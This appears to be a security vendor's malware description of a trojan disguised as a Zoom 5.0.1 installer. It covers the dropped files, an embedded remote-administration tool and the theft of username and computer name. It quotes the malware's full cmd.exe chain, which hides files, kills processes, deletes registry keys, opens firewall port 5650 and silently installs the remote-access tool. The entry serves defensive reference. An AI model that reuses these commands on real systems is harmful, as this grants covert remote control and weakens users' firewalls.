Trojan.Win32.ZAPIZ.THA

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Arrival Details

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Trojan adds the following folders:

• %User Temp%\$inst

(Note: %User Temp% is the current user's Temp folder, which is usually C:\Documents and Settings\{user name}\Local Settings\Temp on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\AppData\Local\Temp on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).)

It drops the following files:

• %User Temp%\$inst\2.tmp
• %User Temp%\$inst\temp_0.tmp - Deleted afterwards
• %System%\drivers\install.exe - Detected as Trojan.Win32.ZAPIZ.THB
• %System%\drivers\ssleay32.dll
• %System%\drivers\libeay32.dll
• %System%\drivers\svchîst.exe - Detected as HackTool.Win32.RADMIN.GL
• %User Temp%\Zoom Meetings\5.0.1\setup.exe
• %User Temp%\$inst\0001.tmp - Deleted afterwards
• %User Temp%\Zoom Meetings\5.0.1\reg.exe
• %System%\idfgvgjnghcdfb.reg

It adds the following processes:

• "%System%\cmd.exe" /c if exist "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg" (goto& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit) else taskkill /f /im rutserv.exe& taskkill /f /im rfusclient.exe& reg delete "HKLM\SYSTEM\Remote Manipulator System" /f& netsh firewall add portopening TCP 5650 "Open Port 5650"& netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650& "%SYSTEMROOT%\System32\drivers\install.exe"& ping 127.0.0.1& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /silentinstall&"%SYSTEMROOT%\System32\drivers\svchîst.exe" /firewall& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /start& Echo Windows Registry Editor Version 5.00> %SYSTEMROOT%\System32\idfgvgjnghcdfb.reg& attrib +h +s "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg"& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit
• "%User Temp%\Zoom Meetings\5.0.1\setup.exe"
• "%User Temp%\Zoom Meetings\5.0.1\reg.exe" shortcut "%Application Data%\Zoom\bin\Zoom.exe" "~$folder.desktop$" "Start Zoom"
• "%System%\cmd.exe" /c attrib -h -s -r "%User Temp%\Zoom Meetings\5.0.1\*.*"
• "%System%\cmd.exe" /c RMDIR /s/q "%User Temp%\Zoom Meetings"
• "%System%\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Zoom Meetings 5.0.1" /f
• "%System%\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 19.0.9700.2132" /f

(Note: %User Temp% is the current user's Temp folder, which is usually C:\Documents and Settings\{user name}\Local Settings\Temp on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\AppData\Local\Temp on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).. %Application Data% is the current user's Application Data folder, which is usually C:\Documents and Settings\{user name}\Application Data on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\AppData\Roaming on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).)

Information Theft

This Trojan gathers the following data:

• Username
• Computer Name

Other Details

This Trojan does the following:

• Executes the following command to open the following port:
  
  • netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650